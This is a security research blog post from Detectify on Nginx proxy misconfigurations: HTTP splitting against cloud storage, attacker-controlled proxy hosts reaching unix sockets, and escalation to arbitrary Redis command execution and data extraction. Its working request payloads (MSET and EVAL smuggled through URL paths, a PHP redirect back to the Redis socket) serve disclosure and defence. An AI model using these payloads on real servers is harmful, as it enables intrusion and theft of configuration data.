What is Detectify?

Middleware, middleware everywhere - and lots of misconfigurations to fix

Frans Rosén / February 18, 2021

tl;dr Detectify Crowdsource found some interesting middleware misconfigurations and potential exploits that, if left unchecked, leaves your web applications vulnerable to attack.

Last year, Detectify’s security research team looked at various middleware, primarily for Nginx web servers, load balancers and proxies. We’ve found some fun stuff. Some of these things are most likely known, but some of them were new to us so we wanted to share what we found. The fact that bug bounties enable widespread research has made it possible for us to see that a lot of these cases were actually happening in real life. The project called Gixy created by Yandex found a lot of these middleware misconfigurations, but not all of them.

So, let’s begin.

Exploiting HTTP Splitting with cloud storage

HTTP splitting is not a new thing and has been covered before multiple times. It is also a part of the OWASP-checklist. However, we’ve seen an increasing number of hosts utilizing proxy-solutions for static content against Google Cloud Storage and AWS S3 on /media/, /images/, /sitemap/ and similar locations. If the regular expressions are weak in these cases, they allow the good ol’ HTTP splitting to happen. Cloud storage services, which mainly use the Host-header to decide which bucket to serve from, are a perfect candidate to have on the other end of the proxy to be able to exploit it.

Let’s say you have a web server and want to proxy to external content on specific paths. One example of this could be media assets hosted on S3, or a completely different app under yourdomain.com/docs/.

One configuration you could do (hint: don’t) might look like this:

location ~ /docs/([^/]*/[^/]*)? {
    proxy_pass https://bucket.s3.amazonaws.com/docs-website/$1.html;

In this case, any URL under yourdomain.com/docs/ would be served from S3. The regular expression states that yourdomain.com/docs/help/contact-us would fetch the S3-object located at:


Now, the problem with this regular expression is that it also allows newlines per default. In this case, the [^/]* part actually also includes encoded newlines. And when the regular expression group is passed into proxy_pass, the group will be url-decoded. This means that the following request:

GET /docs/%20HTTP/1.1%0d%0aHost:non-existing-bucket1%0d%0a%0d%0a HTTP/1.1
Host: yourdomain.com

Would actually make the following request from the web server to S3:

GET /docs-website/ HTTP/1.1

.html HTTP/1.0
Host: bucket.s3.amazonaws.com

Where S3 to fetch content from the bucket called non-existing-bucket1. The response in this case would be:


The following bug was found in the wild multiple times on bug bounty programs. The result of this leads to same-domain injection of any content.



Gixy does identify the issue when the regular expression in the location also captures new lines. However, there are other cases where Gixy doesn’t know the impact of being able to control parts of the paths. We’ve seen issues with nginx-configs like this:

location ~ /images([0-9]+)/([^\s]+) {
    proxy_pass https://s3.amazonaws.com/companyname-images$1/$2;

In this case, the company used multiple buckets that were used for /images1/ and /images2/. However, since the regular expression allowed any number, providing a much larger number in the URL would allow us to create a new bucket and serve our content on it, such as yourcompany.com/images999999/ below:


Controlling proxied host

In some setups, a matching path is used as part of the hostname to proxy to:

location ~ /static/(.*)/(.*) {
proxy_pass   http://$1-example.s3.amazonaws.com/$2;

In this case, any URL under yourdomain.com/static/js/ would be served from S3, in the corresponding js-example bucket. The regular expression states that yourdomain.com/static/js/app-1555347823-min.js would fetch the S3-object located at:


Since the bucket is attacker controlled (part of the URI path), this leads to XSS but also has further implications.

The proxy_pass feature in Nginx supports proxying requests to local unix sockets. What might be surprising is that the URI given to proxy_pass can be prefixed with http:// or as a UNIX-domain socket path specified after the word unix and enclosed in colons:


This means that in our example, we could make proxy_pass connect to a local unix socket and control parts of the data that would be sent to it. The impact of this varies depending on what listens on the socket, but in many cases it’s far from harmless.

Let’s take a look at how such a setup could be used to send and retrieve arbitrary commands to/from redis hosted on a local unix socket. The following assumes that the permissions of the redis socket allows the Nginx user.

Current mitigations

SSRF/XSPA attacks against redis is nothing new, and the redis team has put mitigations in place to avoid such attacks. The following conditions will make redis close the connection and stop parsing commands:

  1. The line starts with POST
  2. The line starts with Host:

The first one mitigates the classic scenario where an attacker would use the request body to send commands. The second mitigates any HTTP based attacks (at least the ones with payloads below the Host-header). However, if we could somehow use the first line of the request to issue redis commands, this mitigation could be bypassed.

To see if this was possible, we set up a local Unix socket using socat and an Nginx server configured with the bug:

$ socat UNIX-LISTEN:/tmp/mysocket STDOUT
location ~ /static/(.*)/(.*.js) {
    proxy_pass   http://$1-example.s3.amazonaws.com/$2;

For this request:

GET /static/unix:%2ftmp%2fmysocket:TEST/app-1555347823-min.js HTTP/1.1
Host: example.com

The socket receives this information:

GET TEST-example.s3.amazonaws.com/app-1555347823-min.js HTTP/1.0
Host: localhost
Connection: close

What happened here? The breakdown:

  1. Full proxy_pass URI becomes http://unix:/tmp/mysocket:TEST-example.s3.amazonaws.com/app-1555347823-min.js
  2. The first part of data sent to the socket is the HTTP request method GET
  3. The second part is the data we specified as TEST
  4. The third part is the hardcoded -example.s3.amazonaws.com/
  5. The fourth part is the filename, or the second group in the matching regex app-1555347823-min.js

Great! Surely we can just use the red and the green parts to create a redis command and comment out the rest?

Well, sadly there’s no comments in redis, which means that even though we can insert spaces to make the yellow and blue part arguments to the command, redis is very strict with regards to typing and extra arguments.

We’re out of luck using the request body or other headers too, since Nginx will always append the Host: header directly under the first request line, which as aforementioned will make redis drop the connection and stop the attack.

Redis key overwrite

Luckily, redis commands accepting a variable amount of arguments do exist. MSET (https://redis.io/commands/mset) takes a variable amount of keys and values:

MSET key1 "Hello" key2 "World"
GET key1
GET key2

In other words, we can use a request such as this to write any key:

MSET /static/unix:%2ftmp%2fmysocket:hacked%20%22true%22%20/app-1555347823-min.js HTTP/1.1
Host: example.com

Resulting in the following data on the socket (to redis):

MSET hacked "true" -example.s3.amazonaws.com/app-1555347823-min.js 
Host: localhost
Connection: close

And checking redis for the hacked key:> get hacked

Great! We have confirmed that we can write any keys. But what about issuing commands which do not accept a variable amount of arguments?

Arbitrary Redis command execution

Enter: the Redis EVAL command.

It turns out that the Redis EVAL command takes a variable amount of arguments too:

  • The first argument of EVAL is a Lua 5.1 script.
  • The second argument of EVAL is the number of arguments that follows the script (starting from the third argument) that represents Redis key names.
  • All the additional arguments should not represent key names and can be accessed by Lua using the ARGV global variable.

We can execute Redis commands from EVAL using two different Lua functions:

  • redis.call()
  • redis.pcall()

Let’s try using EVAL to overwrite the maxclients config key:

Host: example.com

Resulting in:

EVAL "return redis.call('config','set','maxclients',1337)" 0 -example.s3.amazonaws.com/app-1555347823-min.js HTTP/1.0
Host: localhost
Connection: close

And checking the maxclients key after the request:> config get maxclients
1) "maxclients"
2) "1337"

Great! We can issue arbitrary redis commands. Only one last problem. None of these commands respond with a valid HTTP response, and Nginx will not forward the output of the commands to the client, but instead a generic 502 Bad Gateway error.

So how do we extract data?

Reading Redis output

To our surprise, we can avoid the 502 error by simply having the string HTTP/1.0 200 OK anywhere in the response, and the full response from Redis will be forwarded to the client. Even if it’s not the first line of the response!

To make sure the response from Redis always contains that string, we can use string concatenation in the Lua script.

Example extracting response from CONFIG GET * command:

EVAL /static/unix:%2ftmp%2fmysocket:'return%20(table.concat(redis.call("config","get","*"),"\n").."%20HTTP/1.1%20200%20OK\r\n\r\n")'%200%20/app-1555347823-min.js HTTP/1.1
Host: example.com

Resulting in:

EVAL 'return (table.concat(redis.call("config","get","*"),"\n").." HTTP/1.1 200 OK\r\n\r\n")' 0 -example.s3.amazonaws.com/app-1555347823-min.js HTTP/1.0
Host: localhost
Connection: close

And the output is forwarded to the client:


Following redirects

Now, we can take this a step further. If you want the proxy_pass to follow redirects instead of reflecting it, there’s no setting for that. However, a lot of examples (hello StackOverflow) show that you could do the following (hint: don’t):

location ~ /images(.*) {
    proxy_intercept_errors on;
    proxy_pass   http://example.com$1;
    error_page 301 302 307 303 = @handle_redirects;
location @handle_redirects {
    set $original_uri $uri;
    set $orig_loc $upstream_http_location;
    proxy_pass $orig_loc;

This basically says that if the origin host responds with status 301, it will use the location-header and pass it into another proxy_pass inside the @handle_redirects. This means that if this sort of rewrite is made, and an open redirect exists at the origin, we control the full part of proxy_pass. This however requires the origin host to redirect when we are using the EVAL HTTPmethod, but as shown above, if we can make the request point to our malicious origin, we can make sure it will also redirect an EVAL request back to the unix-socket:

error_page 404 405 =301 @405;
location @405 {
  try_files /index.php?$args /index.php?$args;
header('Location: http://unix:/tmp/redis.sock:\'return (table.concat(redis.call("config","get","*"),"\n").." HTTP/1.1 200 OK\r\n\r\n")\' 1 ', true, 301);


Accessing internal Nginx blocks

By using the X-Accel-Redirect response header, we can make Nginx redirect internally to serve another config block, even ones marked with the internal directive:

location /internal_only/ {
    root /var/www/html/internal/;

Accessing localhost restricted Nginx blocks

By using a hostname with a DNS A pointer to, we can make Nginx redirect internally to blocks allowing localhost only:

location /localhost_only/ {
    deny all;
    root /var/www/html/internal/;


Middleware plays a crucial role in enabling your web server platform to provide the web services modern web applications need. Yet the ubiquity and usefulness of middleware also mean there are potential pitfalls to avoid, especially if you’re running on an open source platform like Nginx.

How can Detectify help?

Detectify can detect all of these middleware misconfigurations discussed and more beyond the OWASP Top 10. Start checking for these vulnerabilities and find them in time before they’re exploited by someone else.  Sign up for a free 2-week trial of Detectify today to get started.


Frans Rosen (@fransrosen)
Detectify Co-founder and Security Advisor

Mathias Karlsson (@avlidienbrunn)
Detectify Co-founder and Security Advisor

Fredrik Nordberg Almroth (@almroot)
Detectify Co-founder and Head of Engineering